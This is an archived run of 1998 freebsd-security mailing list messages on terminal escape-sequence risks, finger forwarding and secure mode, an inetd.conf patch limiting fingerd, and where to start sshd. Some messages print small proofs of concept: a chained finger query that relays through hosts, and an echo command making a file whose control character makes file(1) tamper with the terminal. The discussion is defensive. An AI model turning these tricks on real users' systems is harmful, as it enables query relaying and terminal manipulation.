-- mouse support, changing the title of your xterm, the ability to discover terminal type without asking the user every time they log in or start a terminal. Live without terminal interaction between the terminal and the interactive terminal program isn't all that much fun. I like that programs can retrieve the size of the current xterm, or take advantage of mouse buttons. However, to address these issues, it sounds like someone should submit a patch to the X consortium and to XFree86 adding a new xterm option to disable this. I use more, and rely on my set of applications to provide filtering, so I am not a prime candidate here. Keep in mind also that this option should not be the default, as it breaks existing functionality that is not, by itself, insecure. Robert N Watson Carnegie Mellon University http://www.cmu.edu/ TIS Labs at Network Associates, Inc. http://www.tis.com/ SafePort Network Services http://www.safeport.com/ robert@fledge.watson.org http://www.watson.org/~robert/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 11 15:42:59 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id PAA22007 for freebsd-security-outgoing; Fri, 11 Sep 1998 15:42:59 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id PAA22000 for ; Fri, 11 Sep 1998 15:42:57 -0700 (PDT) (envelope-from imp@village.org) Received: from harmony [10.0.0.6] by rover.village.org with esmtp (Exim 1.71 #1) id 0zHbtc-00070y-00; Fri, 11 Sep 1998 16:42:28 -0600 Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.1/8.8.3) with ESMTP id QAA17684; Fri, 11 Sep 1998 16:42:32 -0600 (MDT) Message-Id: <199809112242.QAA17684@harmony.village.org> To: ark@eltex.ru Subject: Re: terminal escape exploit (was Re: cat exploit) Cc: security@FreeBSD.ORG In-reply-to: Your message of "Fri, 11 Sep 1998 14:06:54 +0400." <199809111006.OAA04817@paranoid.eltex.spb.ru> References: <199809111006.OAA04817@paranoid.eltex.spb.ru> Date: Fri, 11 Sep 1998 16:42:32 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <199809111006.OAA04817@paranoid.eltex.spb.ru> ark@eltex.ru writes: : Oh really? afair vt52 was too dumb and had no programmable keys and : only responces you could get back from it were screen cursor position and : some simple status info. You need vt100 at least. I'm nearly positive that the VT52 (and the VT50) allowed for a "answerback" string that could be set in software. I seem to recall writing some code to take advantage of this back when I was in high school for a company doing VMS 3.4 and RSTS/E 6.3 or 7.0. However, my memory is dim about this, since it might have just been a terminal type detection.... Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 11 17:29:11 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id RAA03582 for freebsd-security-outgoing; Fri, 11 Sep 1998 17:29:11 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from ns1.seidata.com (ns1.seidata.com [208.10.211.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id RAA03572 for ; Fri, 11 Sep 1998 17:29:05 -0700 (PDT) (envelope-from mike@seidata.com) Received: from localhost (mike@localhost) by ns1.seidata.com (8.8.8/8.8.5) with SMTP id UAA09124; Fri, 11 Sep 1998 20:27:56 -0400 (EDT) Date: Fri, 11 Sep 1998 20:27:55 -0400 (EDT) From: Mike To: Hector Gonzalez Jaime cc: Lutz Rabing , security@FreeBSD.ORG Subject: Re: fingerd exploit In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 11 Sep 1998, Hector Gonzalez Jaime wrote: > finger user@host.one@host.two@host.three@so.on FWIW, I believe 'secure finger' takes care of this. I don't recall the exact URL for it right now, but it reportedly takes care of a lot of 'problems' with the standard fingerd. It does have some oddities of its own, IMO, such as storing user plan files, etc. in a dedicated directory, etc. I ran this for awhile when I was using 2.2.7. When I went up to -current, I just kept the default fingerd. Anyone have a suggestion re: the best fingerd to run? -mike To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 11 17:30:53 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id RAA03968 for freebsd-security-outgoing; Fri, 11 Sep 1998 17:30:53 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from ns1.seidata.com (ns1.seidata.com [208.10.211.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id RAA03956 for ; Fri, 11 Sep 1998 17:30:49 -0700 (PDT) (envelope-from mike@seidata.com) Received: from localhost (mike@localhost) by ns1.seidata.com (8.8.8/8.8.5) with SMTP id UAA09453; Fri, 11 Sep 1998 20:29:43 -0400 (EDT) Date: Fri, 11 Sep 1998 20:29:43 -0400 (EDT) From: Mike To: Michal Listos cc: Hector Gonzalez Jaime , security@FreeBSD.ORG Subject: Re: fingerd exploit In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 11 Sep 1998, Michal Listos wrote: > -s Enable secure mode. Queries without a user name are rejected and > forwarding of queries to other remote hosts is denied. *ding* The magic answer... it seems '-s' gives you all the pluses of secure fingerd, and it appears to be the default with -current. -mike To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 11 20:16:23 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id UAA18076 for freebsd-security-outgoing; Fri, 11 Sep 1998 20:16:23 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from roble.com (roble.com [207.5.40.50]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id UAA18070 for ; Fri, 11 Sep 1998 20:16:22 -0700 (PDT) (envelope-from sendmail@roble.com) Received: from localhost (localhost [127.0.0.1]) by roble.com (Roble) with SMTP id UAA10786 for ; Fri, 11 Sep 1998 20:16:08 -0700 (PDT) Date: Fri, 11 Sep 1998 20:16:08 -0700 (PDT) From: Roger Marquis To: freebsd-security@FreeBSD.ORG Subject: Re: sshd In-Reply-To: <20262.905499048@time.cdrom.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 11 Sep 1998, Jordan K. Hubbard wrote: > Because you have your files in the wrong place - if you read the man page > for tcpd, you'll see that the permission files live in /usr/local/etc/hosts.* The 2.2.6 man pages incorrectly identify /etc as the location of hosts.{allow,deny}. FWIW, /etc is the default location on every *other* Unix operating system. When I first ran into this bug (back around 1.0.5) we had to `strings tcpd` to find where the access files were expected to be. This is one of the many FreeBSD ports that (IMHO) offer no advantages over the original package. > Which isn't started from inetd.conf. It's started from /usr/local/etc/rc.d/ > when the system boots; nothing rogue about it. The recommended sshd startup method used to be /etc/rc*(/*), probably for historical reasons. It may still be a good idea on slow CPUs, where it can take a while to generate a session key, or where inetd.conf isn't running, however, in my experience, sshd is much more reliably run from inetd. Roger Marquis Roble Systems Consulting http://www.roble.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 11 21:10:42 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id VAA21326 for freebsd-security-outgoing; Fri, 11 Sep 1998 21:10:42 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from time.cdrom.com (time.cdrom.com [204.216.27.226]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id VAA21321 for ; Fri, 11 Sep 1998 21:10:38 -0700 (PDT) (envelope-from jkh@time.cdrom.com) Received: from time.cdrom.com (jkh@localhost.cdrom.com [127.0.0.1]) by time.cdrom.com (8.8.8/8.8.8) with ESMTP id VAA23356; Fri, 11 Sep 1998 21:10:32 -0700 (PDT) (envelope-from jkh@time.cdrom.com) To: Roger Marquis cc: freebsd-security@FreeBSD.ORG Subject: Re: sshd In-reply-to: Your message of "Fri, 11 Sep 1998 20:16:08 PDT." Date: Fri, 11 Sep 1998 21:10:32 -0700 Message-ID: <23352.905573432@time.cdrom.com> From: "Jordan K. Hubbard" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > The 2.2.6 man pages incorrectly identify /etc as the location of > hosts.{allow,deny}. FWIW, /etc is the default location on every This was fixed. > were expected to be. This is one of the many FreeBSD ports that (IMHO) > offer no advantages over the original package. They're not necessarily supposed to offer any "advantage" over the original, simply to offer convenient one stop shopping for people looking for it. In any case, the whole /etc vs /usr/local/etc argument has already come and gone in this mailing list several times so I won't revive it. :) > The recommended sshd startup method used to be /etc/rc*(/*), probably > for historical reasons. It may still be a good idea on slow CPUs, > where it can take a while to generate a session key, or where > inetd.conf isn't running, however, in my experience, sshd is much more > reliably run from inetd. I haven't had that experience myself, so I guess it's one of those different strokes kinda issues. - Jordan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 11 22:33:45 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id WAA27615 for freebsd-security-outgoing; Fri, 11 Sep 1998 22:33:45 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from fledge.watson.org (COPLAND.CODA.CS.CMU.EDU [128.2.222.48]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id WAA27610 for ; Fri, 11 Sep 1998 22:33:41 -0700 (PDT) (envelope-from robert@cyrus.watson.org) Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.8.8/8.8.8) with SMTP id BAA11759; Sat, 12 Sep 1998 01:33:09 -0400 (EDT) Date: Sat, 12 Sep 1998 01:33:09 -0400 (EDT) From: Robert Watson X-Sender: robert@fledge.watson.org Reply-To: Robert Watson To: "Jordan K. Hubbard" cc: Roger Marquis , freebsd-security@FreeBSD.ORG Subject: Re: sshd In-Reply-To: <23352.905573432@time.cdrom.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 11 Sep 1998, Jordan K. Hubbard wrote: > > The recommended sshd startup method used to be /etc/rc*(/*), probably > > for historical reasons. It may still be a good idea on slow CPUs, > > where it can take a while to generate a session key, or where > > inetd.conf isn't running, however, in my experience, sshd is much more > > reliably run from inetd. > > I haven't had that experience myself, so I guess it's one of those > different strokes kinda issues. The one funny thing I've experienced with sshd (+kerberosIV/AFS patches) is that every hour during key regeneration, no one can log in. Connections are accepted via TCP, and the SSH version number banner is passed back, but no logins are allowed during the key generation (users get a login refused of some kind). I believe that is the event that results in this effect) Running it from inetd might improve that arrangement, but on my slower machines the key generation time from running it out of inetd would really suck. :) I keep meaning to track this down but haven't yet. Robert N Watson Carnegie Mellon University http://www.cmu.edu/ TIS Labs at Network Associates, Inc. http://www.tis.com/ SafePort Network Services http://www.safeport.com/ robert@fledge.watson.org http://www.watson.org/~robert/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 11 22:34:57 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id WAA27662 for freebsd-security-outgoing; Fri, 11 Sep 1998 22:34:57 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from drwho.xnet.com (drwho.xnet.com [205.243.140.183]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id WAA27655 for ; Fri, 11 Sep 1998 22:34:55 -0700 (PDT) (envelope-from drwho@drwho.xnet.com) Received: (from drwho@localhost) by drwho.xnet.com (8.8.8/8.8.8) id MAA16433; Fri, 11 Sep 1998 12:44:31 -0500 (CDT) (envelope-from drwho) Message-ID: <19980911124430.A15005@drwho.xnet.com> Date: Fri, 11 Sep 1998 12:44:30 -0500 From: Michael Maxwell To: security@FreeBSD.ORG Subject: Re: cat exploit Mail-Followup-To: security@FreeBSD.ORG References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.91i In-Reply-To: ; from patl@phoenix.volant.org on Thu, Sep 10, 1998 at 10:57:59AM -0700 X-Useless-Header: http://www.xnet.com/~drwho/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, Sep 10, 1998 at 10:57:59AM -0700, patl@phoenix.volant.org wrote: > No, I usually 'less', 'more', or even 'emacs' it. For two reasons. > 1) INSTALL is usually too large to fit in a single terminal window; > sometimes too large to fit in the default scrollbuffer. 2) It > might contain characters that would make my terminal window do > something I'd rather it didn't... And another solution that has thus far been forgotten: file(1). I use this routinely, on systems that have it, before I "cat" or "more" a file... -- drwho @ xnet.com -- http://www.xnet.com/~drwho/ "Freedom of government is good, but freedom FROM government is better." To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 11 23:42:33 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id XAA04048 for freebsd-security-outgoing; Fri, 11 Sep 1998 23:42:33 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from aniwa.sky (pppk-16.igrin.co.nz [202.49.245.95]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id XAA04000 for ; Fri, 11 Sep 1998 23:42:20 -0700 (PDT) (envelope-from andrew@squiz.co.nz) Received: from localhost (andrew@localhost) by aniwa.sky (8.8.7/8.8.7) with SMTP id SAA05389; Sat, 12 Sep 1998 18:41:42 +1200 (NZST) (envelope-from andrew@squiz.co.nz) Date: Sat, 12 Sep 1998 18:41:41 +1200 (NZST) From: Andrew McNaughton X-Sender: andrew@aniwa.sky Reply-To: andrew@squiz.co.nz To: Michael Maxwell cc: security@FreeBSD.ORG Subject: Re: cat exploit In-Reply-To: <19980911124430.A15005@drwho.xnet.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 11 Sep 1998, Michael Maxwell wrote: > On Thu, Sep 10, 1998 at 10:57:59AM -0700, patl@phoenix.volant.org wrote: > > No, I usually 'less', 'more', or even 'emacs' it. For two reasons. > > 1) INSTALL is usually too large to fit in a single terminal window; > > sometimes too large to fit in the default scrollbuffer. 2) It > > might contain characters that would make my terminal window do > > something I'd rather it didn't... > > And another solution that has thus far been forgotten: file(1). I use this > routinely, on systems that have it, before I "cat" or "more" a file... Not reliable. By way of a test I just created a largish text file with some binary data tacked on the end, and file(1) described it as ASCII text. Andrew McNaughton To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Sep 12 02:33:57 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id CAA14462 for freebsd-security-outgoing; Sat, 12 Sep 1998 02:33:57 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from verdi.nethelp.no (verdi.nethelp.no [158.36.41.162]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id CAA14457 for ; Sat, 12 Sep 1998 02:33:55 -0700 (PDT) (envelope-from sthaug@nethelp.no) From: sthaug@nethelp.no Received: (qmail 12397 invoked by uid 1001); 12 Sep 1998 09:33:41 +0000 (GMT) To: marquis@roble.com Cc: freebsd-security@FreeBSD.ORG Subject: Re: sshd In-Reply-To: Your message of "Fri, 11 Sep 1998 20:16:08 -0700 (PDT)" References: X-Mailer: Mew version 1.05+ on Emacs 19.34.2 Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Date: Sat, 12 Sep 1998 11:33:41 +0200 Message-ID: <12395.905592821@verdi.nethelp.no> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > The recommended sshd startup method used to be /etc/rc*(/*), probably > for historical reasons. It may still be a good idea on slow CPUs, > where it can take a while to generate a session key, or where > inetd.conf isn't running, however, in my experience, sshd is much more > reliably run from inetd. I believe it *is* still the recommended method, even on faster CPUs. I've used SSH since it came out, and I've found starting from /etc/rc*(/*) to very reliable. I actually have several machines whose *only* possibility of remote login is through ssh. It just runs and runs... Steinar Haug, Nethelp consulting, sthaug@nethelp.no To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Sep 12 04:13:19 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id EAA23283 for freebsd-security-outgoing; Sat, 12 Sep 1998 04:13:19 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from mail.ftf.dk (mail.ftf.dk [129.142.64.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id EAA23278 for ; Sat, 12 Sep 1998 04:13:17 -0700 (PDT) (envelope-from regnauld@deepo.prosa.dk) Received: from mail.prosa.dk ([192.168.100.254]) by mail.ftf.dk (8.8.8/8.8.8/gw-ftf-1.0) with ESMTP id NAA19248; Sat, 12 Sep 1998 13:18:09 +0200 (CEST) (envelope-from regnauld@deepo.prosa.dk) Received: from deepo.prosa.dk (deepo.prosa.dk [192.168.100.10]) by mail.prosa.dk (8.8.8/8.8.5/prosa-1.1) with ESMTP id NAA18957; Sat, 12 Sep 1998 13:25:53 +0200 (CEST) Received: (from regnauld@localhost) by deepo.prosa.dk (8.8.8/8.8.5/prosa-1.1) id NAA19063; Sat, 12 Sep 1998 13:16:16 +0200 (CEST) Message-ID: <19980912131616.56832@deepo.prosa.dk> Date: Sat, 12 Sep 1998 13:16:16 +0200 From: Philippe Regnauld To: andrew@squiz.co.nz Cc: Jay Tribick , freebsd-security@FreeBSD.ORG Subject: Re: Err.. cat exploit.. (!) References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.88e In-Reply-To: ; from Andrew McNaughton on Fri, Sep 11, 1998 at 07:39:59AM +1200 X-Operating-System: FreeBSD 2.2.6-RELEASE i386 Phone: +45 3336 4148 Address: Ahlefeldtsgade 16, 1359 Copenhagen K, Denmark Organization: PROSA Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Andrew McNaughton writes: > > This is the key point. If you could get something executed merely by > having it passed to a terminal then all sorts of exploits presumably > become possible. They have been for years. I'm sure you can find some horror stories about vtXXX terminals being manipulated with weird esc- sequences. -- -[ Philippe Regnauld / sysadmin / regnauld@deepo.prosa.dk / +55.4N +11.3E ]- The Internet is busy. Please try again later. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Sep 12 04:21:58 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id EAA23988 for freebsd-security-outgoing; Sat, 12 Sep 1998 04:21:58 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from mail.ftf.dk (mail.ftf.dk [129.142.64.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id EAA23981 for ; Sat, 12 Sep 1998 04:21:55 -0700 (PDT) (envelope-from regnauld@deepo.prosa.dk) Received: from mail.prosa.dk ([192.168.100.254]) by mail.ftf.dk (8.8.8/8.8.8/gw-ftf-1.0) with ESMTP id NAA19293; Sat, 12 Sep 1998 13:27:07 +0200 (CEST) (envelope-from regnauld@deepo.prosa.dk) Received: from deepo.prosa.dk (deepo.prosa.dk [192.168.100.10]) by mail.prosa.dk (8.8.8/8.8.5/prosa-1.1) with ESMTP id NAA18964; Sat, 12 Sep 1998 13:34:52 +0200 (CEST) Received: (from regnauld@localhost) by deepo.prosa.dk (8.8.8/8.8.5/prosa-1.1) id NAA19109; Sat, 12 Sep 1998 13:25:12 +0200 (CEST) Message-ID: <19980912132511.46246@deepo.prosa.dk> Date: Sat, 12 Sep 1998 13:25:11 +0200 From: Philippe Regnauld To: Mark Valentine Cc: security@FreeBSD.ORG Subject: file(1) exploit ? (Was: cat exploit) References: <199809110121.CAA04444@thuvia.demon.co.uk> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.88e In-Reply-To: <199809110121.CAA04444@thuvia.demon.co.uk>; from Mark Valentine on Fri, Sep 11, 1998 at 02:21:41AM +0100 X-Operating-System: FreeBSD 2.2.6-RELEASE i386 Phone: +45 3336 4148 Address: Ahlefeldtsgade 16, 1359 Copenhagen K, Denmark Organization: PROSA Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Mark Valentine writes: > > file(1) isn't safe, e.g. try it on a file which starts: > > #! ^E > > (Replace ^E with a real control char.) Wow. % echo "#! ^E" >xxxxx % file xxxxx xxxxx: commands text for % 1;2c _ ^ cursor here Obviously, that's not good. -- -[ Philippe Regnauld / sysadmin / regnauld@deepo.prosa.dk / +55.4N +11.3E ]- The Internet is busy. Please try again later. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Sep 12 08:44:16 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id IAA11988 for freebsd-security-outgoing; Sat, 12 Sep 1998 08:44:16 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from baerenklau.de.freebsd.org (baerenklau.de.freebsd.org [195.185.195.14]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id IAA11983 for ; Sat, 12 Sep 1998 08:44:13 -0700 (PDT) (envelope-from wosch@panke.de.freebsd.org) Received: (from uucp@localhost) by baerenklau.de.freebsd.org (8.8.8/8.8.8) with UUCP id RAA23838 for security@freebsd.org; Sat, 12 Sep 1998 17:44:00 +0200 (CEST) (envelope-from wosch@panke.de.freebsd.org) Received: (from wosch@localhost) by campa.panke.de (8.8.8/8.8.8) id PAA01992 for security@freebsd.org; Sat, 12 Sep 1998 15:05:23 +0200 (MET DST) (envelope-from wosch) Message-ID: <19980912150521.A1985@panke.de> Date: Sat, 12 Sep 1998 15:05:22 +0200 From: Wolfram Schneider To: security@FreeBSD.ORG Subject: unlimited fingerd in /etc/inetd.conf Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.93.1i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I think we should not run an unlimited fingerd(8) from inetd by default. With this patch inetd runs only 3 simultaneous fingerd processes and limit the connections-per-ip-per-minute to 10. Index: inetd.conf =================================================================== RCS file: /usr/cvs/src/etc/inetd.conf,v retrieving revision 1.29 diff -u -r1.29 inetd.conf --- inetd.conf 1998/09/02 01:34:56 1.29 +++ inetd.conf 1998/09/12 12:57:13 @@ -8,7 +8,7 @@ telnet stream tcp nowait root /usr/libexec/telnetd telnetd shell stream tcp nowait root /usr/libexec/rshd rshd login stream tcp nowait root /usr/libexec/rlogind rlogind -finger stream tcp nowait nobody /usr/libexec/fingerd fingerd -s +finger stream tcp nowait/3/10 nobody /usr/libexec/fingerd fingerd -s #exec stream tcp nowait root /usr/libexec/rexecd rexecd #uucpd stream tcp nowait root /usr/libexec/uucpd uucpd #nntp stream tcp nowait usenet /usr/libexec/nntpd nntpd -- Wolfram Schneider http://www.freebsd.org/~w/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Sep 12 18:01:59 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id SAA02499 for freebsd-security-outgoing; Sat, 12 Sep 1998 18:01:59 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from ifi.uio.no (ifi.uio.no [129.240.64.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id SAA02485 for ; Sat, 12 Sep 1998 18:01:52 -0700 (PDT) (envelope-from dag-erli@ifi.uio.no) Received: from hvergelmir.ifi.uio.no (2602@hvergelmir.ifi.uio.no [129.240.64.129]) by ifi.uio.no (8.8.8/8.8.7/ifi0.2) with ESMTP id DAA15207; Sun, 13 Sep 1998 03:01:35 +0200 (MET DST) Received: (from dag-erli@localhost) by hvergelmir.ifi.uio.no ; Sun, 13 Sep 1998 03:01:35 +0200 (MET DST) Mime-Version: 1.0 To: Roger Marquis Cc: freebsd-security@FreeBSD.ORG Subject: Re: sshd References: Organization: University of Oslo, Department of Informatics X-url: http://www.stud.ifi.uio.no/~dag-erli/ X-other-addresses: 'finger dag-erli@ifi.uio.no' for a list X-disclaimer-1: The views expressed in this article are mine alone, and do X-disclaimer-2: not necessarily coincide with those of any organisation or X-disclaimer-3: company with which I am or have been affiliated. X-Stop-Spam: http://www.cauce.org/ From: dag-erli@ifi.uio.no (Dag-Erling =?iso-8859-1?Q?Co=EFdan?= =?iso-8859-1?Q?Sm=F8rgrav?= ) Date: 13 Sep 1998 03:01:34 +0200 In-Reply-To: Roger Marquis's message of "Fri, 11 Sep 1998 20:16:08 -0700 (PDT)" Message-ID: Lines: 15 X-Mailer: Gnus v5.5/Emacs 19.34 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by hub.freebsd.org id SAA02495 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Roger Marquis writes: > The recommended sshd startup method used to be /etc/rc*(/*), probably > for historical reasons. It may still be a good idea on slow CPUs, > where it can take a while to generate a session key, or where > inetd.conf isn't running, however, in my experience, sshd is much more > reliably run from inetd. "Much more reliable"? What's more reliable than 100%? Have you ever experienced any problems running sshd from /usr/local/etc/rc.d/? I haven't, and *all* boxes I control rely entirely on ssh for remote access, and have inetd disabled. DES -- Dag-Erling Smørgrav - dag-erli@ifi.uio.no To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Sep 12 18:19:50 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id SAA03868 for freebsd-security-outgoing; Sat, 12 Sep 1998 18:19:50 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from taku.cchem.berkeley.edu (taku.cchem.berkeley.edu [128.32.220.208]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id SAA03862 for ; Sat, 12 Sep 1998 18:19:47 -0700 (PDT) (envelope-from msinatra@uclink4.berkeley.edu) Received: from deuterium.cchem.berkeley.edu (iridium.cchem.berkeley.edu [128.32.246.5]) by taku.cchem.berkeley.edu (8.9.1/8.9.1) with SMTP id SAA28453; Sat, 12 Sep 1998 18:19:30 -0700 (PDT) Date: Sat, 12 Sep 1998 18:19:26 -0700 (PDT) From: Michael Sinatra X-Sender: msinatra@iridium.cchem.berkeley.edu To: Roger Marquis cc: freebsd-security@FreeBSD.ORG Subject: Re: sshd In-Reply-To: Message-ID: Distribution: ucb MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 11 Sep 1998, Roger Marquis wrote: > The 2.2.6 man pages incorrectly identify /etc as the location of > hosts.{allow,deny}. FWIW, /etc is the default location on every > *other* Unix operating system. It goes without saying that the type of Unix system has nothing to do with it--you can change the default location when you compile tcpd by changing HOSTS_ALLOW and HOSTS_DENY. When I first ran into this bug (back > around 1.0.5) we had to `strings tcpd` to find where the access files > were expected to be. This is one of the many FreeBSD ports that (IMHO) > offer no advantages over the original package. Is it supposed to offer any advantages other than being able to cd into the ports directory and simply type 'make' and have the system fetch the distribution and do everything for you, *and* be reasonably well-assured that the beast is going to compile? That is a pretty huge advantage for an overworked sysadmin like myself. I gave a talk a few weeks ago to UCB sysadmins on all of the different unixish options on intel hardware, and I demonstrated how /usr/ports works in FreeBSD. Everyone thought it was really cool, and needless to say, the freebie 2.2.6 cds that I had went like hotcakes. > The recommended sshd startup method used to be /etc/rc*(/*), probably > for historical reasons. It may still be a good idea on slow CPUs, > where it can take a while to generate a session key, or where > inetd.conf isn't running, however, in my experience, sshd is much more > reliably run from inetd. Hmmm. I have never had any problems running it standalone. I have noticed that the connections are slow to make during key regeneration on slow machines, but no "unreliability." Michael Sinatra Unix Guy College of Chemistry UC Berkeley To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Sep 12 19:53:13 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id TAA11073 for freebsd-security-outgoing; Sat, 12 Sep 1998 19:53:13 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from RWSystems.net (Commie.RWSystems.net [204.251.23.221]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id TAA11067 for ; Sat, 12 Sep 1998 19:53:12 -0700 (PDT) (envelope-from jwyatt@rwsystr.RWSystems.net) Received: from rwsystr.RWSystems.net([204.251.23.1]) (1524 bytes) by RWSystems.net via sendmail with P:smtp/R:inet_hosts/T:smtp (sender: ) id for ; Sat, 12 Sep 1998 21:30:52 -0500 (CDT) (Smail-3.2.0.101 1997-Dec-17 #1 built 1998-Jul-31) Date: Sat, 12 Sep 1998 